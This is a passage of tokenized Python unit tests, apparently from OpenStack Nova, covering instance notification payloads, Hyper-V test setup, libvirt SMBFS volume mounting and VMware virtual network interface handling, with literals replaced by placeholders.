assertEqual ( n . payload [ '<STR_LIT:status>' ] , <NUM_LIT> ) <EOL> self . assertIsNotNone ( n . payload [ '<STR_LIT>' ] ) <EOL> self . assertIsNotNone ( n . context ) <EOL> self . assertTrue ( n . context . is_admin ) <EOL> def test_notif_disabled ( self ) : <EOL> self . flags ( notify_on_state_change = None ) <EOL> old = copy . copy ( self . instance ) <EOL> self . instance . vm_state = vm_states . ACTIVE <EOL> old_vm_state = old [ '<STR_LIT>' ] <EOL> new_vm_state = self . instance . vm_state <EOL> old_task_state = old [ '<STR_LIT>' ] <EOL> new_task_state = self . instance . task_state <EOL> notifications . send_update_with_states ( self . context , self . instance , <EOL> old_vm_state , new_vm_state , old_task_state , new_task_state , <EOL> verify_states = True ) <EOL> notifications . send_update ( self . context , old , self . instance ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> def test_task_notif ( self ) : <EOL> self . flags ( notify_on_state_change = "<STR_LIT>" ) <EOL> old = copy . copy ( self . instance ) <EOL> self . instance . task_state = task_states . SPAWNING <EOL> old_vm_state = old [ '<STR_LIT>' ] <EOL> new_vm_state = self . instance . vm_state <EOL> old_task_state = old [ '<STR_LIT>' ] <EOL> new_task_state = self . instance . task_state <EOL> notifications . send_update_with_states ( self . context , self . instance , <EOL> old_vm_state , new_vm_state , old_task_state , new_task_state , <EOL> verify_states = True ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> self . flags ( notify_on_state_change = "<STR_LIT>" ) <EOL> notifications . send_update ( self . context , old , self . instance ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> def test_send_no_notif ( self ) : <EOL> old_vm_state = self . instance . vm_state <EOL> new_vm_state = self . instance . vm_state <EOL> old_task_state = self . instance . task_state <EOL> new_task_state = self . instance . task_state <EOL> notifications . send_update_with_states ( self . context , self . instance , <EOL> old_vm_state , new_vm_state , old_task_state , new_task_state , <EOL> service = "<STR_LIT>" , host = None , verify_states = True ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> def test_send_on_vm_change ( self ) : <EOL> old = obj_base . obj_to_primitive ( self . instance ) <EOL> old [ '<STR_LIT>' ] = None <EOL> self . instance . vm_state = vm_states . ACTIVE <EOL> notifications . send_update ( self . context , old , self . instance ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> notif = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> self . assertEqual ( '<STR_LIT>' , notif . publisher_id ) <EOL> def test_send_on_task_change ( self ) : <EOL> old = obj_base . obj_to_primitive ( self . instance ) <EOL> old [ '<STR_LIT>' ] = None <EOL> self . instance . task_state = task_states . SPAWNING <EOL> notifications . send_update ( self . context , old , self . instance ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> def test_no_update_with_states ( self ) : <EOL> notifications . send_update_with_states ( self . context , self . instance , <EOL> vm_states . BUILDING , vm_states . BUILDING , task_states . SPAWNING , <EOL> task_states . SPAWNING , verify_states = True ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> def test_vm_update_with_states ( self ) : <EOL> notifications . send_update_with_states ( self . context , self . instance , <EOL> vm_states . BUILDING , vm_states . ACTIVE , task_states . SPAWNING , <EOL> task_states . SPAWNING , verify_states = True ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> notif = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> payload = notif . payload <EOL> access_ip_v4 = str ( self . instance . access_ip_v4 ) <EOL> access_ip_v6 = str ( self . instance . access_ip_v6 ) <EOL> display_name = self . instance . display_name <EOL> hostname = self . instance . hostname <EOL> node = self . instance . node <EOL> self . assertEqual ( vm_states . BUILDING , payload [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( vm_states . ACTIVE , payload [ "<STR_LIT:state>" ] ) <EOL> self . assertEqual ( task_states . SPAWNING , payload [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( task_states . SPAWNING , payload [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , access_ip_v4 ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , access_ip_v6 ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , display_name ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , hostname ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , node ) <EOL> def test_task_update_with_states ( self ) : <EOL> self . flags ( notify_on_state_change = "<STR_LIT>" ) <EOL> notifications . send_update_with_states ( self . context , self . instance , <EOL> vm_states . BUILDING , vm_states . BUILDING , task_states . SPAWNING , <EOL> None , verify_states = True ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> notif = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> payload = notif . payload <EOL> access_ip_v4 = str ( self . instance . access_ip_v4 ) <EOL> access_ip_v6 = str ( self . instance . access_ip_v6 ) <EOL> display_name = self . instance . display_name <EOL> hostname = self . instance . hostname <EOL> self . assertEqual ( vm_states . BUILDING , payload [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( vm_states . BUILDING , payload [ "<STR_LIT:state>" ] ) <EOL> self . assertEqual ( task_states . SPAWNING , payload [ "<STR_LIT>" ] ) <EOL> self . assertIsNone ( payload [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , access_ip_v4 ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , access_ip_v6 ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , display_name ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , hostname ) <EOL> def test_update_no_service_name ( self ) : <EOL> notifications . send_update_with_states ( self . context , self . instance , <EOL> vm_states . BUILDING , vm_states . BUILDING , task_states . SPAWNING , <EOL> None ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> notif = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> self . assertEqual ( '<STR_LIT>' , notif . publisher_id ) <EOL> def test_update_with_service_name ( self ) : <EOL> notifications . send_update_with_states ( self . context , self . instance , <EOL> vm_states . BUILDING , vm_states . BUILDING , task_states . SPAWNING , <EOL> None , service = "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> notif = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> self . assertEqual ( '<STR_LIT>' , notif . publisher_id ) <EOL> def test_update_with_host_name ( self ) : <EOL> notifications . send_update_with_states ( self . context , self . instance , <EOL> vm_states . BUILDING , vm_states . BUILDING , task_states . SPAWNING , <EOL> None , host = "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> notif = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> self . assertEqual ( '<STR_LIT>' , notif . publisher_id ) <EOL> def test_payload_has_fixed_ip_labels ( self ) : <EOL> info = notifications . info_from_instance ( self . context , self . instance , <EOL> self . net_info , None ) <EOL> self . assertIn ( "<STR_LIT>" , info ) <EOL> self . assertEqual ( info [ "<STR_LIT>" ] [ <NUM_LIT:0> ] [ "<STR_LIT:label>" ] , "<STR_LIT>" ) <EOL> def test_payload_has_vif_mac_address ( self ) : <EOL> info = notifications . info_from_instance ( self . context , self . instance , <EOL> self . net_info , None ) <EOL> self . assertIn ( "<STR_LIT>" , info ) <EOL> self . assertEqual ( self . net_info [ <NUM_LIT:0> ] [ '<STR_LIT:address>' ] , <EOL> info [ "<STR_LIT>" ] [ <NUM_LIT:0> ] [ "<STR_LIT>" ] ) <EOL> def test_payload_has_cell_name_empty ( self ) : <EOL> info = notifications . info_from_instance ( self . context , self . instance , <EOL> self . net_info , None ) <EOL> self . assertIn ( "<STR_LIT>" , info ) <EOL> self . assertIsNone ( self . instance . cell_name ) <EOL> self . assertEqual ( "<STR_LIT>" , info [ "<STR_LIT>" ] ) <EOL> def test_payload_has_cell_name ( self ) : <EOL> self . instance . cell_name = "<STR_LIT>" <EOL> info = notifications . info_from_instance ( self . context , self . instance , <EOL> self . net_info , None ) <EOL> self . assertIn ( "<STR_LIT>" , info ) <EOL> self . assertEqual ( "<STR_LIT>" , info [ "<STR_LIT>" ] ) <EOL> def test_payload_has_progress_empty ( self ) : <EOL> info = notifications . info_from_instance ( self . context , self . instance , <EOL> self . net_info , None ) <EOL> self . assertIn ( "<STR_LIT>" , info ) <EOL> self . assertIsNone ( self . instance . progress ) <EOL> self . assertEqual ( "<STR_LIT>" , info [ "<STR_LIT>" ] ) <EOL> def test_payload_has_progress ( self ) : <EOL> self . instance . progress = <NUM_LIT:50> <EOL> info = notifications . info_from_instance ( self . context , self . instance , <EOL> self . net_info , None ) <EOL> self . assertIn ( "<STR_LIT>" , info ) <EOL> self . assertEqual ( <NUM_LIT:50> , info [ "<STR_LIT>" ] ) <EOL> def test_send_access_ip_update ( self ) : <EOL> notifications . send_update ( self . context , self . instance , self . instance ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> notif = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> payload = notif . payload <EOL> access_ip_v4 = str ( self . instance . access_ip_v4 ) <EOL> access_ip_v6 = str ( self . instance . access_ip_v6 ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , access_ip_v4 ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , access_ip_v6 ) <EOL> def test_send_name_update ( self ) : <EOL> param = { "<STR_LIT>" : "<STR_LIT>" } <EOL> new_name_inst = self . _wrapped_create ( params = param ) <EOL> notifications . send_update ( self . context , self . instance , new_name_inst ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> notif = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> payload = notif . payload <EOL> old_display_name = self . instance . display_name <EOL> new_display_name = new_name_inst . display_name <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , old_display_name ) <EOL> self . assertEqual ( payload [ "<STR_LIT>" ] , new_display_name ) <EOL> def test_send_no_state_change ( self ) : <EOL> called = [ False ] <EOL> def sending_no_state_change ( context , instance , ** kwargs ) : <EOL> called [ <NUM_LIT:0> ] = True <EOL> self . stub_out ( '<STR_LIT>' , <EOL> sending_no_state_change ) <EOL> notifications . send_update ( self . context , self . instance , self . instance ) <EOL> self . assertTrue ( called [ <NUM_LIT:0> ] ) <EOL> def test_fail_sending_update ( self ) : <EOL> def fail_sending ( context , instance , ** kwargs ) : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> self . stub_out ( '<STR_LIT>' , <EOL> fail_sending ) <EOL> notifications . send_update ( self . context , self . instance , self . instance ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> @ mock . patch . object ( notifications . LOG , '<STR_LIT>' ) <EOL> def test_fail_sending_update_instance_not_found ( self , mock_log_exception ) : <EOL> notfound = exception . InstanceNotFound ( instance_id = self . instance . uuid ) <EOL> with mock . patch . object ( notifications , <EOL> '<STR_LIT>' , <EOL> side_effect = notfound ) : <EOL> notifications . send_update ( <EOL> self . context , self . instance , self . instance ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> self . assertEqual ( <NUM_LIT:0> , mock_log_exception . call_count ) <EOL> @ mock . patch . object ( notifications . LOG , '<STR_LIT>' ) <EOL> def test_fail_send_update_with_states_inst_not_found ( self , <EOL> mock_log_exception ) : <EOL> notfound = exception . InstanceNotFound ( instance_id = self . instance . uuid ) <EOL> with mock . patch . object ( notifications , <EOL> '<STR_LIT>' , <EOL> side_effect = notfound ) : <EOL> notifications . send_update_with_states ( <EOL> self . context , self . instance , <EOL> vm_states . BUILDING , vm_states . ERROR , <EOL> task_states . NETWORKING , new_task_state = None ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> self . assertEqual ( <NUM_LIT:0> , mock_log_exception . call_count ) <EOL> def _decorated_function ( self , arg1 , arg2 ) : <EOL> self . decorated_function_called = True <EOL> def test_notify_decorator ( self ) : <EOL> func_name = self . _decorated_function . __name__ <EOL> self . _decorated_function = notifications . notify_decorator ( <EOL> func_name , <EOL> self . _decorated_function ) <EOL> ctxt = o_context . RequestContext ( ) <EOL> self . _decorated_function ( <NUM_LIT:1> , ctxt ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( fake_notifier . NOTIFICATIONS ) ) <EOL> n = fake_notifier . NOTIFICATIONS [ <NUM_LIT:0> ] <EOL> self . assertEqual ( n . priority , '<STR_LIT>' ) <EOL> self . assertEqual ( n . event_type , func_name ) <EOL> self . assertEqual ( n . context , ctxt ) <EOL> self . assertTrue ( self . decorated_function_called ) <EOL> class NotificationsFormatTestCase ( test . NoDBTestCase ) : <EOL> def test_state_computation ( self ) : <EOL> instance = { '<STR_LIT>' : mock . sentinel . vm_state , <EOL> '<STR_LIT>' : mock . sentinel . task_state } <EOL> states = notifications . _compute_states_payload ( instance ) <EOL> self . assertEqual ( mock . sentinel . vm_state , states [ '<STR_LIT:state>' ] ) <EOL> self . assertEqual ( mock . sentinel . vm_state , states [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( mock . sentinel . task_state , states [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( mock . sentinel . task_state , states [ '<STR_LIT>' ] ) <EOL> states = notifications . _compute_states_payload ( <EOL> instance , <EOL> old_vm_state = mock . sentinel . old_vm_state , <EOL> ) <EOL> self . assertEqual ( mock . sentinel . vm_state , states [ '<STR_LIT:state>' ] ) <EOL> self . assertEqual ( mock . sentinel . old_vm_state , states [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( mock . sentinel . task_state , states [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( mock . sentinel . task_state , states [ '<STR_LIT>' ] ) <EOL> states = notifications . _compute_states_payload ( <EOL> instance , <EOL> old_vm_state = mock . sentinel . old_vm_state , <EOL> old_task_state = mock . sentinel . old_task_state , <EOL> new_vm_state = mock . sentinel . new_vm_state , <EOL> new_task_state = mock . sentinel . new_task_state , <EOL> ) <EOL> self . assertEqual ( mock . sentinel . new_vm_state , states [ '<STR_LIT:state>' ] ) <EOL> self . assertEqual ( mock . sentinel . old_vm_state , states [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( mock . sentinel . old_task_state , <EOL> states [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( mock . sentinel . new_task_state , <EOL> states [ '<STR_LIT>' ] ) </s>
<s> import mock <EOL> from os_win import utilsfactory <EOL> from six . moves import builtins <EOL> from nova import test <EOL> class HyperVBaseTestCase ( test . NoDBTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( HyperVBaseTestCase , self ) . setUp ( ) <EOL> self . _mock_wmi = mock . MagicMock ( ) <EOL> wmi_patcher = mock . patch . object ( builtins , '<STR_LIT>' , create = True , <EOL> new = self . _mock_wmi ) <EOL> platform_patcher = mock . patch ( '<STR_LIT>' , '<STR_LIT:win32>' ) <EOL> utilsfactory_patcher = mock . patch . object ( utilsfactory , '<STR_LIT>' ) <EOL> platform_patcher . start ( ) <EOL> wmi_patcher . start ( ) <EOL> utilsfactory_patcher . start ( ) <EOL> self . addCleanup ( wmi_patcher . stop ) <EOL> self . addCleanup ( platform_patcher . stop ) <EOL> self . addCleanup ( utilsfactory_patcher . stop ) </s>
<s> import os <EOL> import mock <EOL> from nova . tests . unit . virt . libvirt . volume import test_volume <EOL> from nova import utils <EOL> from nova . virt . libvirt import utils as libvirt_utils <EOL> from nova . virt . libvirt . volume import smbfs <EOL> class LibvirtSMBFSVolumeDriverTestCase ( test_volume . LibvirtVolumeBaseTestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( LibvirtSMBFSVolumeDriverTestCase , self ) . setUp ( ) <EOL> self . mnt_base = '<STR_LIT>' <EOL> self . flags ( smbfs_mount_point_base = self . mnt_base , group = '<STR_LIT>' ) <EOL> @ mock . patch . object ( libvirt_utils , '<STR_LIT>' ) <EOL> def test_libvirt_smbfs_driver ( self , mock_is_mounted ) : <EOL> mock_is_mounted . return_value = False <EOL> libvirt_driver = smbfs . LibvirtSMBFSVolumeDriver ( self . fake_conn ) <EOL> export_string = '<STR_LIT>' <EOL> export_mnt_base = os . path . join ( self . mnt_base , <EOL> utils . get_hash_str ( export_string ) ) <EOL> connection_info = { '<STR_LIT:data>' : { '<STR_LIT>' : export_string , <EOL> '<STR_LIT:name>' : self . name , <EOL> '<STR_LIT>' : None } } <EOL> libvirt_driver . connect_volume ( connection_info , self . disk_info ) <EOL> libvirt_driver . disconnect_volume ( connection_info , "<STR_LIT>" ) <EOL> expected_commands = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , export_mnt_base ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> export_string , export_mnt_base ) , <EOL> ( '<STR_LIT>' , export_mnt_base ) ] <EOL> self . assertEqual ( expected_commands , self . executes ) <EOL> def test_libvirt_smbfs_driver_already_mounted ( self ) : <EOL> libvirt_driver = smbfs . LibvirtSMBFSVolumeDriver ( self . fake_conn ) <EOL> export_string = '<STR_LIT>' <EOL> export_mnt_base = os . path . join ( self . mnt_base , <EOL> utils . get_hash_str ( export_string ) ) <EOL> connection_info = { '<STR_LIT:data>' : { '<STR_LIT>' : export_string , <EOL> '<STR_LIT:name>' : self . name } } <EOL> libvirt_driver . connect_volume ( connection_info , self . disk_info ) <EOL> libvirt_driver . disconnect_volume ( connection_info , "<STR_LIT>" ) <EOL> expected_commands = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , export_mnt_base , <EOL> '<STR_LIT>' , export_string ) , <EOL> ( '<STR_LIT>' , export_mnt_base ) ] <EOL> self . assertEqual ( expected_commands , self . executes ) <EOL> def test_libvirt_smbfs_driver_get_config ( self ) : <EOL> libvirt_driver = smbfs . LibvirtSMBFSVolumeDriver ( self . fake_conn ) <EOL> export_string = '<STR_LIT>' <EOL> export_mnt_base = os . path . join ( self . mnt_base , <EOL> utils . get_hash_str ( export_string ) ) <EOL> file_path = os . path . join ( export_mnt_base , self . name ) <EOL> connection_info = { '<STR_LIT:data>' : { '<STR_LIT>' : export_string , <EOL> '<STR_LIT:name>' : self . name , <EOL> '<STR_LIT>' : file_path } } <EOL> conf = libvirt_driver . get_config ( connection_info , self . disk_info ) <EOL> tree = conf . format_dom ( ) <EOL> self . _assertFileTypeEquals ( tree , file_path ) <EOL> @ mock . patch . object ( libvirt_utils , '<STR_LIT>' ) <EOL> def test_libvirt_smbfs_driver_with_opts ( self , mock_is_mounted ) : <EOL> mock_is_mounted . return_value = False <EOL> libvirt_driver = smbfs . LibvirtSMBFSVolumeDriver ( self . fake_conn ) <EOL> export_string = '<STR_LIT>' <EOL> options = '<STR_LIT>' <EOL> export_mnt_base = os . path . join ( self . mnt_base , <EOL> utils . get_hash_str ( export_string ) ) <EOL> connection_info = { '<STR_LIT:data>' : { '<STR_LIT>' : export_string , <EOL> '<STR_LIT:name>' : self . name , <EOL> '<STR_LIT>' : options } } <EOL> libvirt_driver . connect_volume ( connection_info , self . disk_info ) <EOL> libvirt_driver . disconnect_volume ( connection_info , "<STR_LIT>" ) <EOL> expected_commands = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , export_mnt_base ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> export_string , export_mnt_base ) , <EOL> ( '<STR_LIT>' , export_mnt_base ) ] <EOL> self . assertEqual ( expected_commands , self . executes ) </s>
<s> import mock <EOL> from oslo_vmware import exceptions as vexc <EOL> from oslo_vmware import vim_util <EOL> from nova import exception <EOL> from nova . network import model as network_model <EOL> from nova import test <EOL> from nova . tests . unit import matchers <EOL> from nova . tests . unit import utils <EOL> from nova . tests . unit . virt . vmwareapi import fake <EOL> from nova . virt . vmwareapi import constants <EOL> from nova . virt . vmwareapi import network_util <EOL> from nova . virt . vmwareapi import vif <EOL> from nova . virt . vmwareapi import vm_util <EOL> class VMwareVifTestCase ( test . NoDBTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( VMwareVifTestCase , self ) . setUp ( ) <EOL> self . flags ( vlan_interface = '<STR_LIT>' , group = '<STR_LIT>' ) <EOL> network = network_model . Network ( id = <NUM_LIT:0> , <EOL> bridge = '<STR_LIT>' , <EOL> label = '<STR_LIT>' , <EOL> vlan = <NUM_LIT:3> , <EOL> bridge_interface = '<STR_LIT>' , <EOL> injected = True ) <EOL> self . _network = network <EOL> self . vif = network_model . NetworkInfo ( [ <EOL> network_model . VIF ( id = None , <EOL> address = '<STR_LIT>' , <EOL> network = network , <EOL> type = None , <EOL> devname = None , <EOL> ovs_interfaceid = None , <EOL> rxtx_cap = <NUM_LIT:3> ) <EOL> ] ) [ <NUM_LIT:0> ] <EOL> self . session = fake . FakeSession ( ) <EOL> self . cluster = None <EOL> def tearDown ( self ) : <EOL> super ( VMwareVifTestCase , self ) . tearDown ( ) <EOL> def test_ensure_vlan_bridge ( self ) : <EOL> self . mox . StubOutWithMock ( network_util , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( network_util , <EOL> '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( network_util , <EOL> '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( network_util , '<STR_LIT>' ) <EOL> network_util . get_network_with_the_name ( self . session , '<STR_LIT>' , <EOL> self . cluster ) . AndReturn ( None ) <EOL> network_util . get_vswitch_for_vlan_interface ( self . session , '<STR_LIT>' , <EOL> self . cluster ) . AndReturn ( '<STR_LIT>' ) <EOL> network_util . check_if_vlan_interface_exists ( self . session , '<STR_LIT>' , <EOL> self . cluster ) . AndReturn ( True ) <EOL> network_util . create_port_group ( self . session , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:3> , <EOL> self . cluster ) <EOL> network_util . get_network_with_the_name ( self . session , '<STR_LIT>' , None ) <EOL> self . mox . ReplayAll ( ) <EOL> vif . ensure_vlan_bridge ( self . session , self . vif , create_vlan = True ) <EOL> def test_ensure_vlan_bridge_without_vlan ( self ) : <EOL> self . mox . StubOutWithMock ( network_util , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( network_util , <EOL> '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( network_util , <EOL> '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( network_util , '<STR_LIT>' ) <EOL> network_util . get_network_with_the_name ( self . session , '<STR_LIT>' , <EOL> self . cluster ) . AndReturn ( None ) <EOL> network_util . get_vswitch_for_vlan_interface ( self . session , '<STR_LIT>' , <EOL> self . cluster ) . AndReturn ( '<STR_LIT>' ) <EOL> network_util . check_if_vlan_interface_exists ( self . session , '<STR_LIT>' , <EOL> self . cluster ) . AndReturn ( True ) <EOL> network_util . create_port_group ( self . session , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:0> , <EOL> self . cluster ) <EOL> network_util . get_network_with_the_name ( self . session , '<STR_LIT>' , None ) <EOL> self . mox . ReplayAll ( ) <EOL> vif . ensure_vlan_bridge ( self . session , self . vif , create_vlan = False ) <EOL> def test_ensure_vlan_bridge_with_network ( self ) : <EOL> self . mox . StubOutWithMock ( network_util , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( network_util , <EOL> '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( network_util , <EOL> '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( network_util , '<STR_LIT>' ) <EOL> vm_network = { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } <EOL> network_util . get_network_with_the_name ( self . session , '<STR_LIT>' , <EOL> self . cluster ) . AndReturn ( vm_network ) <EOL> self . mox . ReplayAll ( ) <EOL> vif . ensure_vlan_bridge ( self . session , self . vif , create_vlan = False ) <EOL> def test_ensure_vlan_bridge_with_existing_dvs ( self ) : <EOL> network_ref = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' } <EOL> self . mox . StubOutWithMock ( network_util , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( network_util , <EOL> '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( network_util , <EOL> '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( network_util , '<STR_LIT>' ) <EOL> network_util . get_network_with_the_name ( self . session , '<STR_LIT>' , <EOL> self . cluster ) . AndReturn ( network_ref ) <EOL> self . mox . ReplayAll ( ) <EOL> ref = vif . ensure_vlan_bridge ( self . session , <EOL> self . vif , <EOL> create_vlan = False ) <EOL> self . assertThat ( ref , matchers . DictMatches ( network_ref ) ) <EOL> def test_get_network_ref_flat_dhcp ( self ) : <EOL> self . mox . StubOutWithMock ( vif , '<STR_LIT>' ) <EOL> vif . ensure_vlan_bridge ( self . session , self . vif , cluster = self . cluster , <EOL> create_vlan = False ) <EOL> self . mox . ReplayAll ( ) <EOL> vif . get_network_ref ( self . session , self . cluster , self . vif , False ) <EOL> def test_get_network_ref_bridge ( self ) : <EOL> self . mox . StubOutWithMock ( vif , '<STR_LIT>' ) <EOL> vif . ensure_vlan_bridge ( self . session , self . vif , cluster = self . cluster , <EOL> create_vlan = True ) <EOL> self . mox . ReplayAll ( ) <EOL> network = network_model . Network ( id = <NUM_LIT:0> , <EOL> bridge = '<STR_LIT>' , <EOL> label = '<STR_LIT>' , <EOL> vlan = <NUM_LIT:3> , <EOL> bridge_interface = '<STR_LIT>' , <EOL> injected = True , <EOL> should_create_vlan = True ) <EOL> self . vif = network_model . NetworkInfo ( [ <EOL> network_model . VIF ( id = None , <EOL> address = '<STR_LIT>' , <EOL> network = network , <EOL> type = None , <EOL> devname = None , <EOL> ovs_interfaceid = None , <EOL> rxtx_cap = <NUM_LIT:3> ) <EOL> ] ) [ <NUM_LIT:0> ] <EOL> vif . get_network_ref ( self . session , self . cluster , self . vif , False ) <EOL> def test_create_port_group_already_exists ( self ) : <EOL> def fake_call_method ( module , method , * args , ** kwargs ) : <EOL> if method == '<STR_LIT>' : <EOL> raise vexc . AlreadyExistsException ( ) <EOL> with test . nested ( <EOL> mock . patch . object ( vm_util , '<STR_LIT>' ) , <EOL> mock . patch . object ( vm_util , '<STR_LIT>' ) , <EOL> mock . patch . object ( self . session , '<STR_LIT>' , <EOL> fake_call_method ) <EOL> ) as ( _add_vswitch , _get_host , _call_method ) : <EOL> network_util . create_port_group ( self . session , '<STR_LIT>' , <EOL> '<STR_LIT>' , vlan_id = <NUM_LIT:0> , <EOL> cluster = None ) <EOL> def test_create_port_group_exception ( self ) : <EOL> def fake_call_method ( module , method , * args , ** kwargs ) : <EOL> if method == '<STR_LIT>' : <EOL> raise vexc . VMwareDriverException ( ) <EOL> with test . nested ( <EOL> mock . patch . object ( vm_util , '<STR_LIT>' ) , <EOL> mock . patch . object ( vm_util , '<STR_LIT>' ) , <EOL> mock . patch . object ( self . session , '<STR_LIT>' , <EOL> fake_call_method ) <EOL> ) as ( _add_vswitch , _get_host , _call_method ) : <EOL> self . assertRaises ( vexc . VMwareDriverException , <EOL> network_util . create_port_group , <EOL> self . session , '<STR_LIT>' , <EOL> '<STR_LIT>' , vlan_id = <NUM_LIT:0> , <EOL> cluster = None ) <EOL> def test_get_vif_info_none ( self ) : <EOL> vif_info = vif . get_vif_info ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , None ) <EOL> self . assertEqual ( [ ] , vif_info ) <EOL> def test_get_vif_info_empty_list ( self ) : <EOL> vif_info = vif . get_vif_info ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , [ ] ) <EOL> self . assertEqual ( [ ] , vif_info ) <EOL> @ mock . patch . object ( vif , '<STR_LIT>' , return_value = '<STR_LIT>' ) <EOL> def test_get_vif_info ( self , mock_get_network_ref ) : <EOL> network_info = utils . get_test_network_info ( ) <EOL> vif_info = vif . get_vif_info ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , network_info ) <EOL> expected = [ { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ] <EOL> self . assertEqual ( expected , vif_info ) <EOL> @ mock . patch . object ( vif , '<STR_LIT>' ) <EOL> def test_get_neutron_network_ovs_integration_bridge ( self , <EOL> mock_check ) : <EOL> self . flags ( integration_bridge = '<STR_LIT>' , group = '<STR_LIT>' ) <EOL> vif_info = network_model . NetworkInfo ( [ <EOL> network_model . VIF ( type = network_model . VIF_TYPE_OVS , <EOL> address = '<STR_LIT>' , <EOL> network = self . _network ) ] <EOL> ) [ <NUM_LIT:0> ] <EOL> network_ref = vif . _get_neutron_network ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> vif_info ) <EOL> expected_ref = { 